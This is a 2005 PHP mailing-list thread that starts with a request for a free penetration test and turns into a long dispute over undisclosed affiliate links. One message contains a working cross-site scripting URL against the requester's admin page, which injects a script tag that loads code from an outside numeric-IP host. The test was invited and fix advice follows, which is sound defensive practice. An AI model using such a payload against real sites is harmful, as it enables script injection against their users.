Re: [PHP] Re: Free penetration test

2005-05-30 Thread Manuel Lemos

Hello,

on 05/27/2005 11:50 PM Ryan A said the following:

I have requested the free test several times and it was very useful
because it brought my attention to aspects that I was not considering,
some related to PHP in specific and other related to Internet in
general.

fair enough, you could have given him the link to the page directly
_without_ your affiliate add on code, but since you did tack your aff code
on, I think you should have mentioned it

That would be irrelevant because nothing changes for anybody that
follows the link with or without the aff code. The service is still free
and the service is the same.


Not really, the service is still the same... true,
but what happens if he decides to buy one more scan (49$) from that site or
decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)?
Does a little birdie get 35% (recurring) of that?


Read my phrase again: nothing changes for anybody that follows the link, 
whether or not anybody gains from any referrals.


That means that if a person that follows the link that I suggested buys 
$1000 worth of services or goods, he would still pay $1000 if the link 
did not contain my referral id.


I am sure that you know that it happens that way, but the way you are putting 
you are confusing other people reading the thread by making them believe 
that the price would be different if I were to get any commissions. That 
is false. The price and the service are the same for any user.




-
If I am acting with malice as you suggest just because I did not mention
that the URL contained my affiliate id, what would you say about the PHP
group that lists a pile of books in Amazon linked with their affiliate
id but they do not mention that fact anywhere in their pages?

http://www.php.net/books.php
--
Ummm. this is what's written on the page:
"If you buy the book using the links on this page, you are helping to
support PHP development!"
Lucky for me, English is my mother tongue but I think even if it wasn't and
my IQ was quite a bit lower
I would still get the idea that if I buy a book using one of those links the
site was gaining from it.
Why? because they are being open, decent AND honest about it, see the
"If you buy the book using the links ... you are helping to support"
parts?


You are not being serious and you are only acting with bias against me, 
as nowhere in that page it says that when you use those links, the PHP 
Group (I suppose) may earn 15% on commissions of books sold for their 
referrals to Amazon.


If I just go in that page or some other page that lists PHP books, pick 
the ISBN of a book of Rasmus Lerdorf (the creator of PHP) and buy it 
directly in Amazon or somewhere else, I am sure I will be helping PHP 
development somehow, but the PHP Group would not get a cent for the 
referral.


Still, the links in those pages use the PHP Group Amazon affiliate ID, 
like the link I suggested before includes my affiliate ID. The books 
page omits the actual way it helps PHP development and the affiliate 
IDs are hidden in HTML, unlike my message that was in plain text (I do 
not post in HTML ever).


For me, of course there is nothing wrong on the PHP Group help 
themselves making money with referrals. My point is that it is pretty 
common to not distract people with the details of who gets what with 
referrals because it does not change anything for who follows a link 
with or without the referral id. The price and the service is the same.



What matters is who wants free help can get free help even if that help 
provides some benefit to the person that is providing it. If a person 
that gets free help does not like that whoever provides the help 
benefits from that too, that person is just being ungrateful and so does 
not deserve to be helped.





Nobody is pointing fingers at you because you want to make money, EVERYONE


That is all you did!



you challenged my credibility by distorting the facts. Of course
that bugs me because for 8 years I have been participating in PHP
mailing lists helping people leading to solutions to the problems that
they pose, and your attitude is misleading people into believing that I
am not helping them.


Cool, just one question. everytime you help someone are you helping
yourself too like the way you tried to help Andy?


 Have you noticed some of the guys here who unselfishly answer something
 like:
 I see what the problem is, use this code instead code here and replace
 this code here
 and try reading about this function here url here

 Now, _that's_ unselfishly helping someone...no gain for the helper except
 that warm feeling
 and a clear conscience...maybe even a good night's sleep.


Don't be ridiculous! Everybody gains something when he helps somebody on 
these lists. Sometimes people just feel good for being helpful (think 
for instance of Richard Lynch), other times people actually gain 
reputation and are contracted to provide paid jobs (think for instance 
of 

RE: [PHP] Re: Free penetration test

2005-05-30 Thread Kim Madsen

 -Original Message-
 From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]
 Sent: Saturday, May 28, 2005 3:48 PM
 To: Ryan A
 Cc: php
 Subject: Re: [PHP] Re: Free penetration test
 
 Ryan A wrote:
  That is extremely generous of you as I didn't really think you would have
  the time considering the amount of projects, books etc you are involved
  with (yep, I read your CV on your site :-D ), but I would like to take you
  up on your offer as I am sure to learn something from it...only problem is,
  the site I have just made is mostly in Swedish...I can give you a star
  account (Star accounts are the paid accounts) for you to login and test
  the site, but do you think you could still test it since it's mostly
  in Swedish?
 
 [In Danish] Yes, I think I can manage that.  The language is pretty
 irrelevant, I just check for XSS problems with an automatic tool I have
 written.  So it is not that much work either.

*LOL* Nice comeback Rasmus

For those who don't know, Rasmus is Danish, and the language is in many ways 
and words similar to Swedish (Sweden and Denmark are neighbouring countries)

Well, Ryan probably didn't know this, but that made his posting somewhat funny 
:-)

--
Med venlig hilsen / best regards
ComX Networks A/S
Kim Madsen
Systemudvikler/Systemdeveloper

ComX Networks A/S
Naverland 31, 2 
DK-2600 Glostrup
Denmark
Phone: +45 70 25 74 74
Fax: +45 70 25 73 74
Web: www.comx.dk
E-mail: [EMAIL PROTECTED]

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] Re: Free penetration test

2005-05-30 Thread Murray @ PlanetThoughtful
 For me, of course there is nothing wrong on the PHP Group help
 themselves making money with referrals. My point is that it is pretty
 common to not distract people with the details of who gets what with
 referrals because it does not change anything for who follows a link
 with or without the referral id. The price and the service is the same.
 
 
 What matters is who wants free help can get free help even if that help
 provides some benefit to the person that is providing it. If a person
 that gets free help does not like that whoever provides the help
 benefits from that too, that person is just being ungrateful and so does
 not deserve to be helped.

Sweet Mamma, are we *still* arguing about this?

Manuel (and whomever else): in general it is A Very Good Idea to declare
whenever you have a commercial interest in a solution you provide in a forum
such as this one.

The problem, whether you agree or not, is that others will ask themselves,
Did Manuel (or whomever) supply this link because it is the best solution
he (or she) knows of to my problem, or because it is the only one from which
he (or she) can earn money?

It boils down to a question of motive: are you trying to help, or to use the
forum as a method of earning extra income, or both?

I tend to think the best of people -- I assume you offered the link in good
faith, and you've said as much in posts since. That doesn't negate the fact
that the appropriate place to explain your commercial affiliation is at the
point where you originally supply such a link. It isn't hard. A simple
paragraph similar to the following would be more than adequate:

Please note: I have an affiliation relationship with this site. I picked it
because it was the best I found when I was looking for solutions to the same
problem you're asking about, and share it with you for the very same
reason.

See? Easy, and no-one questions your motives.

To everyone else: many if not most of us take direct commercial benefit from
being involved in this forum. I know I do. I ask questions about problems I
can't solve on my own. I follow and keep track of solutions to other
people's problems that seem innovative and better formulated than my own
methods of dealing with those problems. I keep my general skills sharpened
by helping people solve problems in areas where my skills are relatively
strong. It would be naïve of me not to admit that this has a direct impact
on my earning potential.

As a group of professionals and semi-professionals (and even those amongst
us who are simply learning or developing PHP skills out of general
interest), it should be enough to say: Hey, that wasn't the best way to
handle this. In future, you'd probably cause less aggravation by doing the
following... And then move on. The person doesn't have to agree. You've
done your part for peace-as-we-know-it in the PHP forum.

If that simply isn't good enough for you in situations such as these, if you
have to argue with Manuel (or whomever) until we've all but forgotten what
the original freaking question was that began the holy war, then can I make
a suggestion? If you happen to be a professional or semi-professional PHP
programmer, you might want to think about tagging any and all posts you make
to this forum about problems you're having with: I earn money from PHP
programming. If you help me with this problem it will have a commercial
benefit to me.

And, really, wouldn't that be ridiculous?

So, seriously, let's move on. At least until the next time someone posts an
affiliation link without declaring their commercial interest, and then we
can all look forward to having this argument again.

Regards,

Murray




Re: [PHP] Re: Free penetration test

2005-05-30 Thread Ryan A
Hi,

This is getting pretty irritating because by now even a stone would have
understood what
I was trying to say...so either you are playing dumb or you just dont want
to understand,
that said, this is my last response as I have much better things to do than
say the same thing
over and over...and over and over etc again.

  Not really, the service is still the same... true,
  but what happens if he decides to buy one more scan (49$) from that site or
  decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)?
  Does a little birdie get 35% (recurring) of that?

**
Read my phrase again: nothing changes for anybody that follows the link,
whether or not anybody gains from any referrals.

That means that if a person that follows the link that I suggested buys
$1000 worth of services or goods, he would still pay $1000 if the link
did not contain my referral id.
**
That's how affiliate systems work, they don't add your commission to their
products,
they give you a kind of broker's fee...but you already know that of
course.
When you say nothing changes for anybody that follows the link that's a
half truth as
you would profit if he actually buys something as I have said over and over
and...again.


**
but the way you are putting
you are confusing other people reading the thread by making them believe
that the price would be different if I were to get any commissions.
**
Never said that, all I said (and i'm repeating for the damn 10th time(at
least)) that
you should just mention that the link you send contains your affiliate code
and you gain
something if they buy.


what would you say about the PHP group that lists a pile of books in Amazon
linked with their affiliate
 id but they do not mention that fact anywhere in their pages?
http://www.php.net/books.php
--
 Ummm. this is what's written on the page:
 "If you buy the book using the links on this page, you are helping to
support PHP development!"
 Lucky for me, English is my mother tongue but I think even if it wasn't
and my IQ was quite a bit lower
 I would still get the idea that if I buy a book using one of those links the
site was gaining from it.

***
You are not being serious and you are only acting with bias against me, as
nowhere in that page it says
that when you use those links, the PHP Group (I suppose) may earn 15% on
commissions of books sold
for their referrals to Amazon.
***
Bias against you? You nuts or something?
They dont have to say how much they are getting, they just mentioned that
they gain from it (the decent thing)
Maybe you could have written; clicking the link might help me pay my
bills...or is even that too much for you?



***
My point is that it is pretty common to not distract people with the details
of who gets what with referrals because
it does not change anything for who follows a link with or without the
referral id. The price and the service is the same.
***
First, you are not distracting anybody, you are simply being honest and
showing the person you are helping them
but you are also connected with the site and may have a different motive
for helping them...let them judge.



***
What matters is who wants free help can get free help even if that help
provides some benefit to the person that is providing it. If a person
that gets free help does not like that whoever provides the help
benefits from that too, that person is just being ungrateful and so does
not deserve to be helped.
***
Arrrgh, that just sounds so wrong I wont even go there.



***
Don't be ridiculous! Everybody gains something when he helps somebody on
these lists. Sometimes people just feel good for being helpful (think
for instance of Richard Lynch), other times people actually gain
reputation and are contracted to provide paid jobs (think for instance
of Chris Shifflet), some may even gain money indirectly from commission
referrals (think of the PHP Group with the books page), etc..
***
Fair enough...and people like me gain knowledge and tips from reading other
peoples posts.
As for people who gain indirect commission referrals...which is what this is
all about... let me
put it in a way that might help you understand the whole point of this
side-discussion:
T H E Y  S A Y  T H E Y  A R E  C O N N E C T E D  W I T H  T H E  S I T E
in some way...or that they are gaining from the referral (like in the php
books link)


***
but all my time is taken
with all the PHP related projects that I work on and at least hundreds
of thousands of users benefit.
***
(no comment)
:-)


End of discussion from my side, if you want to continue to argue about the
above please write
to yourself (both what I would say and your answer), but what I do suggest
is you take some time
off and do some thinking... we are not all out to get you...look into the
words 'paranoid' and
'megalomaniac'

Have a nice day.

Regards,
Ryan A





-- 
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.322 / Virus Database: 267.3.0 - Release 

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Manuel Lemos

Hello,

on 05/30/2005 02:21 PM Ryan A said the following:

Not really, the service is still the same... true,
but what happens if he decides to buy one more scan (49$) from that site or
decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)?
Does a little birdie get 35% (recurring) of that?


**
Read my phrase again: nothing changes for anybody that follows the link,
whether or not anybody gains from any referrals.

That means that if a person that follows the link that I suggested buys
$1000 worth of services or goods, he would still pay $1000 if the link
did not contain my referral id.
**
That's how affiliate systems work, they don't add your commission to their
products,
they give you a kind of broker's fee...but you already know that of
course.
When you say nothing changes for anybody that follows the link that's a
half truth as
you would profit if he actually buys something as I have said over and over
and...again.


Right, that just confirms what I said.  The fact that I could profit or 
not does not change anything for whoever follows that link because 
anything that I may gain will not be taken from a loss caused to whoever 
follows the link.





**
but the way you are putting
you are confusing other people reading the thread by making them believe
that the price would be different if I were to get any commissions.
**
Never said that, all I said (and i'm repeating for the damn 10th time(at
least)) that
you should just mention that the link you send contains your affiliate code
and you gain
something if they buy.


No, I don't agree. As I said many times it would be irrelevant because 
it would not change anything in the price or the service that was suggested.





what would you say about the PHP group that lists a pile of books in Amazon
linked with their affiliate
id but they do not mention that fact anywhere in their pages?
http://www.php.net/books.php
--
Ummm. this is what's written on the page:
"If you buy the book using the links on this page, you are helping to
support PHP development!"
Lucky for me, English is my mother tongue but I think even if it wasn't
and my IQ was quite a bit lower
I would still get the idea that if I buy a book using one of those links the
site was gaining from it.

***
You are not being serious and you are only acting with bias against me, as
nowhere in that page it says
that when you use those links, the PHP Group (I suppose) may earn 15% on
commissions of books sold
for their referrals to Amazon.
***
Bias against you? You nuts or something?


You started attacking my reputation and you are still insulting calling 
me dishonest, paranoid and megalomaniac. Until you cease your attacks I 
feel I have the right to defend myself.





They dont have to say how much they are getting, they just mentioned that
they gain from it (the decent thing)


That is false. They do not mention they gain commissions from books sold.

I also did not say I gain commissions from referrals, still you insist 
that I should be crucified for not having done that, while the same 
omission in the PHP books page is acceptable for you. Therefore, your 
bias against me is proven.




Maybe you could have written; clicking the link might help me pay my
bills...or is even that too much for you?


As I said and explained many times, that is irrelevant and distracting 
for the users that may follow my suggestion.




***
My point is that it is pretty common to not distract people with the details
of who gets what with referrals because
it does not change anything for who follows a link with or without the
referral id. The price and the service is the same.
***
First, you are not distracting anybody, you are simply being honest and
showing the person you are helping them


I am honest because I explained that when I was asked. Your claim that I 
am not being honest otherwise, constitutes a direct insult to me.








***
Don't be ridiculous! Everybody gains something when he helps somebody on
these lists. Sometimes people just feel good for being helpful (think
for instance of Richard Lynch), other times people actually gain
reputation and are contracted to provide paid jobs (think for instance
of Chris Shifflet), some may even gain money indirectly from commission
referrals (think of the PHP Group with the books page), etc..
***
Fair enough...and people like me gain knowledge and tips from reading other
peoples posts.
As for people who gain indirect commission referrals...which is what this is
all about... let me
put it in a way that might help you understand the whole point of this
side-discussion:
T H E Y  S A Y  T H E Y  A R E  C O N N E C T E D  W I T H  T H E  S I T E
in some way...or that they are gaining from the referral (like in the php
books link)


Go have a look in the PHP books and tell me where it is mentioned explicitly 
that the PHP Group is connected to Amazon and other stores. Can't find 
that mention? My point is proven.




End of discussion 

Re: [PHP] Re: Free penetration test

2005-05-30 Thread Ryan A
BTW, what do you call to a person that throws stones to another and then
runs away to not face the consequences?!

Fine, I'll play your game a little longer...but offlist as I think the list
has had enough of this,
I'm also a bit busy now so expect a reply from me after a few hours.

Regards,
Ryan






Re: [PHP] Re: Free penetration test

2005-05-30 Thread Ryan A
Hehe, well put...a few things you forgot to write:

Ryan A and Rory Browne got so irritated because it's like talking to a
tree...in English when the tree
only understands some other language :-D
that they tried to throw in the towel

I was so fed up I was going to drop the whole thing because certain well
wishers  wrote
to me too telling me it was hopeless to try to reason or use logic with
him...and I pretty much
dropped it till he got the hairs at the back of my neck up by saying i like
saying things and running..
so am taking it offlist.

Consider this link:

http://www.somesite.com/section=servers&something=somethingelse&a=b&b=a&blah=jack&bill=gates&gates=evil&affilate=1145&more=gibberish&claudia=too_good_for_that_magician_guy

imagine someone gave you that kind of a link when you asked for
help...pretty good but unless you really searched for it you would miss
the affiliate=1145 part...yes, it's there..check it out...the affiliate could
be smaller too..something like aff=1045 but it's lost in the other gibberish
of the url...

Decency would dictate that the person sending you the link tells you there's
an affiliate code there somewhere...
that's all I am saying...but I can't seem to get that message across to
someone...so am pretty much throwing in the towel
after I have a few words offlist ;-)

But all in all, its been a pretty good few weeks  on the list  with no one
asking which php editor is best or
how do you make a script sleep for x seconds or how do i do  on the
clients machine?

Peace all.

Cheers,
Ryan

On 5/31/2005 12:53:26 AM, Rory Browne ([EMAIL PROTECTED]) wrote:
 Okay

 Let me summarise what has happened here.

 1: The OP asked for a free penetration test.

 2: Chris points out that his firm, which provides the suggested
 service, albeit not free, generally recommends a code audit instead.

 3: Manuel Lemos, points out a site that provides a free sample test.
 The url includes a referer id, which Manuel
 doesn't see a need to
 mention.

 4: Ryan A, points out that Manuel Lemos is connected to the site,
 and that his link contains a referer id. He suggests that such facts
 be explicitly disclosed.

 5: Manuel Lemos, responds saying that it is irrelevant, that he gains
 income from his link to the site. He states that Chris Shifett is
 connected to the site that he mentions, and that the php group earn
 money from listing books on their website.

 6: Ryan A, and Rory Browne(ie me) explain, that users generally like
 to know how to treat information they receive. They like to decide for
 themselves if the information may be biased. They also discredit
 Manuel's statements regarding the php group's listing of amazon books.

 7: Manuel repeats step 5, which results in Rory and Ryan repeating
 step 6. This happens numerous times. It becomes clear, that Manuel
will not listen to reason, and will instead repeat the same
discredited arguments. During this time, others point out that they
too would like to be informed of any potential bias, so that they can
decide for themselves if the information is actually biased.

8: Anonymous third parties, suggest via private email, that Manuel
cannot be reasoned with. I decide that I'd perfer to make such
assertions myself, without relying the judgement of others, and give
Manuel the benifit of the doubt. Manuel begins making wild
accusations, leading Ryan ane Rory to take the discussion off-list,
until such stage that a resolution is found.

Let me now summerise the above into an even shorter, and clearer message:

Grow up, and get a grip. We don't know you well enough to have some
wild conspiracy against you.






Re: [PHP] Re: Free penetration test

2005-05-28 Thread Rory Browne
Okay: 

1: Calm down. Your sensationalism and paranoia make you look like a
nutcase.(no offence)

2: 
 That would be irrelevant because nothing changes for anybody that
 follows the link with or without the aff code. The service is still free
Obviously we don't consider it irrelevant. That's all we were trying
to say. We're not trying to paint you as some sort of monster. I
appreciate your posting of that Link. I've used it. I would also have
liked to know that you were affiliated with the site.

3: Relax. This is going away out of proportion.

4: 
  as you get 35% (minimum, for upto a year) if he signs up...not that anybodys
  bothered if you make money
 
 That is false. If he signs up and tries the free penetration test
 service that he asked and I suggested, I do not gain anything. Stop
 deceiving people!

Last time I checked 35% of free, was still free. I therefore put it to
you that even if he doesn't sign up and make any payment, you still
get 35% of that payment(consisting of $0/Eur0/£0) he didn't make.

5:   what would you say about the PHP
 group that lists a pile of books in Amazon linked with their affiliate
 id but they do not mention that fact anywhere in their pages?
 
 http://www.php.net/books.php

Quote from aforementioned website:  If you buy the book using the
links on this page, you are helping to support PHP development! .

Any intelligent user would be able to decipher from that, that the php
group obtains some sort of referral fee, or benefit somehow in your
purchase of said books from the php website.

6:  I was selling security
 auditing services, when in fact the only person that doing that in this
 thread was Chris Shiflet.

I know that, you know that, the majority of the people on this list
know that. Chris told us that. Personally I'd be pretty pissed off, if
Chris posted some website he'd found without mentioning that it was
his website.

The reason I'm _not_ pissed off with you, is because it wasn't
actually your website. I was simply asking you that in future would
you mention your _potential_ bias, even if such bias doesn't exist.


On 5/28/05, Manuel Lemos [EMAIL PROTECTED] wrote:
 Hello,
 
 on 05/27/2005 06:46 PM Ryan A said the following:
  -
  I have requested the free test several times and it was very useful
  because it brought my attention to aspects that I was not considering,
  some related to PHP in specific and other related to Internet in general.
  -
  fair enough, you could have given him the link to the page directly
  _without_
  your affiliate add on code, but since you did tack your aff code on, I think
  you should have mentioned it
 
 That would be irrelevant because nothing changes for anybody that
 follows the link with or without the aff code. The service is still free
 and the service is the same.
 
 
  as you get 35% (minimum, for upto a year) if he signs up...not that anybodys
  bothered if you make money
 
 That is false. If he signs up and tries the free penetration test
 service that he asked and I suggested, I do not gain anything. Stop
 deceiving people!
 
 
  --
  If I ever gain anything with the referral, he would not be paying more for
  whatever services he would order.
  --
  Never said he would be paying extra,  but the point is you would be making
  money off him (not a bad
  thing again) without his knowledge (bad thing)...if he finds the link really
  useful I think to show his appreciation he
  would _make sure_ your affiliate link is tacked there..I would.
 
 Stop distorting the facts. You are implying that I acting with malice by
 stating that I will make money by hiding facts when a) Andy never asked
 explicitly for a service that the referer would not gain anything b) I
 am not hiding anything as the affiliate id is quite visible in the URL
 c) I never denied that the URL contains my affiliate id.
 
 If I am acting with malice as you suggest just because I did not mention
 that the URL contained my affiliate id, what would you say about the PHP
 group that lists a pile of books in Amazon linked with their affiliate
 id but they do not mention that fact anywhere in their pages?
 
 http://www.php.net/books.php
 
 Maybe I am Darth Vader and the PHP Group is the whole dark side of the
 force. Get real, you are being ridiculous!
 
 
  Another example, I am an affilate of interland, if someone asks about
  dedicated hosting I could send them there
  they would join, not pay a cent extra, but i get a commision *without their
  knowledge* (10% recurring)...
  am I helping them or myself?
 
 Yeah, right, you are fighting the dark side of the force to be the good
 guy that just lives from the air that you breath and nobody else should
 be allowed to gain anything from referrals unless you warn users that
 you refer that you are keeping a commission, despite the price is always
 the same!?!
 
 
 
  -
  So, I do not see your point in bugging me for this. If you feel that I
  am not helping Andy, I would 

Re: [PHP] Re: Free penetration test

2005-05-28 Thread Ryan A
Hi,

  Is it bad to give field names the same name as their database
  counterpart? i.e. In a database the first name column might be known as
  'fname'. Should a form field called 'fname' NOT be created?

I actually had the same question a little while ago and after doing some
reading it left me
even more confused...

 As long as you recognize that you need to filter things appropriately it
 doesn't really matter.

Kind of came to that conclusion after a little while and started to use the
ADODB class
to filter all user input that goes to the DB... I would appreciate it if you
tell me if you have used
the class and if you have any warnings/notes/suggestions about how even
after using that class I
can screw up.

 If you have written something and you'd
 like me to take a quick look for
 any obvious exploits, feel free to mail me privately.  If your site
 requires a login, you can send me a test login if you want so I can dig
 a bit deeper, otherwise I will still prod it from the outside.  I'm not
 going to hack into your server in any way, just prod your web
 app

That is extremely generous of you as I didn't really think you would have the
time considering the
amount of projects,books etc you are involved with (yep, I read your CV on
your site :-D ), but
I would like to take you up on your offer as I am sure to learn something
from it...only problem is,
the site I have just made is mostly in Swedish...I can give you a star
account (Star accounts are the
paid accounts) for you to login and test the site, but do you think you
could still test it since its mostly
in Swedish?

Thanks,
Ryan






Re: [PHP] Re: Free penetration test

2005-05-28 Thread Rasmus Lerdorf
Ryan A wrote:
 That is extremely generous of you as I didn't really think you would have the
 time considering the amount of projects, books etc. you are involved with (yep,
 I read your CV on your site :-D ), but I would like to take you up on your offer
 as I am sure to learn something from it...only problem is, the site I have just
 made is mostly in Swedish...I can give you a star account (Star accounts are the
 paid accounts) for you to login and test the site, but do you think you could
 still test it since it's mostly in Swedish?

Yes, I think I can manage that.  The language is pretty much irrelevant, I am
just checking for XSS problems with an automated tool I have written.  So it
is not that much work either.

-Rasmus




Re: [PHP] Re: Free penetration test

2005-05-28 Thread Ryan A
   mostly in Swedish...I can give you a
 star
  account (Star accounts are the
  paid accounts) for you to login and test the site, but do you think you
  could still test it since its mostly
  in Swedish?


 Yes, I think I can manage that.  The language is pretty much irrelevant, I am
 just checking for XSS problems with an automated tool I have written.  So it
 is not that much work either.

Hehehe...it's not Swedish but I understand 95+ % of it..and the balance I
could guess,
Is it Danish?
Right now the site is on my local machine, I will be uploading it middle of
the coming week after which I'll send you the site details including the login.
Thanks again for your time.

Regards,
Ryan






Re: [PHP] Re: Free penetration test

2005-05-27 Thread Ryan A
 You may want to try Security Space services. They perform many types of
 security checks remotely including penetration tests that may reveal
 serious vulnerabilities in your servers. Such vulnerabilities include
 holes, in your server OS version, Web and e-mail servers and even in the
 PHP version that you may have installed.

 You can try their no risk test in this page that is free and in a few
 minutes after the test is requested you get a full report by e-mail.

 http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149

Umm, you forgot to mention that you are connected to that site and you get
a commission for sending them clients, if they sign up.

Nothing wrong with getting an affiliate buck mind you, I have a few affiliate
accounts around too, but I (and others on the list I have noticed, Jay B for
one) mention that we are connected to / own the websites we are sending the
person to.

Regards,
Ryan






Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
 on 05/23/2005 06:19 AM Andy Pieters said the following:
 
 I am looking at where I can get my system tested for penetration.

 In case someone here would like to have a go

 This is the url

 http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/

 It is actually a kind of CMS system so if someone gets in, create a
 page with the cms as proof.

You have all sorts of problems at that URL.  To start with, here is a
cross-site scripting hack:

http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09src%3D%22http://3423329163/v

And you are not doing any input validation either.

-Rasmus




Re: [PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos

Hello,

on 05/27/2005 02:30 PM Ryan A said the following:

You may want to try Security Space services. They perform many types of
security checks remotely including penetration tests that may reveal
serious vulnerabilities in your servers. Such vulnerabilities include
holes, in your server OS version, Web and e-mail servers and even in the
PHP version that you may have installed.

You can try their no risk test in this page that is free and in a few
minutes after the test is requested you get a full report by e-mail.

http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149


Umm, you forgot to mention that you are connected to that site and you get
a commission for sending them clients, if they sign up.

Nothing wrong with getting an affiliate buck mind you, I have a few affiliate
accounts around too, but I (and others on the list I have noticed, Jay B for
one) mention that we are connected to / own the websites we are sending the
person to.


I did not forget to mention anything. Andy asked for a free penetration 
test and that is exactly what he gets going to the page mentioned above.


I have requested the free test several times and it was very useful 
because it brought my attention to aspects that I was not considering, 
some related to PHP in specific and other related to Internet in general.


In all cases it is up to Andy to decide. FYI, if he takes the free 
penetration test as he asks, I still do not gain anything. If I ever 
gain anything with the referral, he would not be paying more for 
whatever services he would order.


So, I do not see your point in bugging me for this. If you feel that I 
am not helping Andy, I would appreciate that you tell me that directly!


--

Regards,
Manuel Lemos

PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/

PHP Reviews - Reviews of PHP books and other products
http://www.phpclasses.org/reviews/

Metastorage - Data object relational mapping layer generator
http://www.meta-language.net/metastorage.html




Re: [PHP] Re: Free penetration test

2005-05-27 Thread Andy Pieters
On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote:
 You have all sorts of problems at that URL.  To start with, here is a
 cross-site scripting hack:

 http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09
src%3D%22http://3423329163/v

Hi Thank you!  I just saw the potential for tricking users but tell me dear 
boy.  How can I prevent this?

 And you are not doing any input validation either.
I fixed that.  It was only in the part that echoes out the last inputted name 
if login fails though because the database abstraction layer I wrote for this 
application escapes all data it receives.


Thank you again


With kind regards


Andy




Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
Andy Pieters wrote:
 On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote:
 
You have all sorts of problems at that URL.  To start with, here is a
cross-site scripting hack:

http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09
src%3D%22http://3423329163/v
 
 
 Hi Thank you!  I just saw the potential for tricking users but tell me dear 
 boy.  How can I prevent this?

Don't display arbitrary key names in hidden fields the way you are.

-Rasmus




Re: [PHP] Re: Free penetration test

2005-05-27 Thread Ryan A
snip
  Umm, you forgot to mention that you are connected to that site and you
  get a commission for sending them clients, if they sign up.
  Nothing wrong with getting an affiliate buck mind you, I have a few
  affiliate accounts around too, but I (and others on the list I have
  noticed, Jay B for one) mention that we are connected to / own the
  websites we are sending the person to.
/snip

reply
I did not forget to mention anything. Andy asked for a free penetration
test and that is exactly what he gets going to the page mentioned above.

I have requested the free test several times and it was very useful
because it brought my attention to aspects that I was not considering,
some related to PHP in specific and other related to Internet in general.

In all cases it is up to Andy to decide. FYI, if he takes the free
penetration test as he asks, I still do not gain anything. If I ever
gain anything with the referral, he would not be paying more for
whatever services he would order.

So, I do not see your point in bugging me for this. If you feel that I
am not helping Andy, I would appreciate that you tell me that directly!
/reply

Dude,
calm down, don't get your underwear in a knot, I was not attacking you
or saying your intentions were not good or that the service being offered on
that page is not exactly what Andy needs...let me explain, you wrote:
-
I have requested the free test several times and it was very useful
because it brought my attention to aspects that I was not considering,
some related to PHP in specific and other related to Internet in general.
-
fair enough, you could have given him the link to the page directly _without_
your affiliate add on code, but since you did tack your aff code on, I think
you should have mentioned it as you get 35% (minimum, for up to a year) if he
signs up...not that anybody's bothered if you make money we like to help each
other out on the list...but just come out and say it then let the receiver
decide if the link is on the level or not.

--
If I ever gain anything with the referral, he would not be paying more for
whatever services he would order.
--
Never said he would be paying extra,  but the point is you would be making
money off him (not a bad thing again) without his knowledge (bad thing)...if he
finds the link really useful I think to show his appreciation he would
_make sure_ your affiliate link is tacked there..I would.
Another example, I am an affiliate of interland, if someone asks about
dedicated hosting I could send them there they would join, not pay a cent
extra, but I get a commission *without their knowledge* (10% recurring)...
am I helping them or myself?

-
So, I do not see your point in bugging me for this. If you feel that I
am not helping Andy, I would appreciate that you tell me that directly!
-
Well, all I can say is, if my little email bugged you, you either get bugged
very easily or you know I'm right!
(I too sometimes get bugged when people point something out and I am wrong
and they are right)
and for the record: I never said you are not helping Andy... but if you don't
come clean and just add a simple line like:
PS: I really like that site so I am an affiliate of theirs, my affiliate link
is on the URL I sent you
or something like that people won't have to doubt your motives...

Or maybe I am just a goody two shoes who says it...and Jay Blanchard when
someone asks about templates and template engines and Chris when someone asks
about SQL injections...and ...oops, too many names.

Cheers,
Ryan







Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rory Browne
On 5/27/05, Manuel Lemos [EMAIL PROTECTED] wrote:
 Hello,
 
 on 05/27/2005 02:30 PM Ryan A said the following:
 You may want to try Security Space services. They perform many types of
 security checks remotely including penetration tests that may reveal
 serious vulnerabilities in your servers. Such vulnerabilities include
 holes, in your server OS version, Web and e-mail servers and even in the
 PHP version that you may have installed.
 
 You can try their no risk test in this page that is free and in a few
 minutes after the test is requested you get a full report by e-mail.
 
 http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149
 
  Umm, you forgot to mention that you are connected to that site and you get
  a commission for sending them clients, if they sign up.
 
  Nothing wrong with getting an affiliate buck mind you, I have a few
  affiliate accounts around too, but I (and others on the list I have noticed,
  Jay B for one) mention that we are connected to / own the websites we are
  sending the person to.
 
 I did not forget to mention anything. Andy asked for a free penetration
 test and that is exactly what he gets going to the page mentioned above.
We generally like to know however if there is potential bias in links
we are being given.

It gives us a better idea how to treat the advice you are giving. I'm
sure the site is on the level, but when you don't mention that you
potentially get paid for putting that link there (through possible
referrals), and we find out it makes us suspicious as to why you failed
to mention it. OTOH, I think a good few of us here, would like to
support each other by choosing services that each other get paid for,
provided they're up front with us.

Based on other posts here, I don't think you meant to deceive. I'm not
attacking, or giving out to you. I'm just saying this FYI.

 
 I have requested the free test several times and it was very useful
 because it brought my attention to aspects that I was not considering,
 some related to PHP in specific and other related to Internet in general.
 
 In all cases it is up to Andy to decide. FYI, if he takes the free
 penetration test as he asks, I still do not gain anything. If I ever
 gain anything with the referral, he would not be paying more for
 whatever services he would order.
 
 So, I do not see your point in bugging me for this. If you feel that I
 am not helping Andy, I would appreciate that you tell me that directly!
I wouldn't consider his post to be bugging you (unless he repeats it,
or has already posted a similar message before). Personally however I
appreciate being made aware of the issue.

 
 --
 
 Regards,
 Manuel Lemos
 
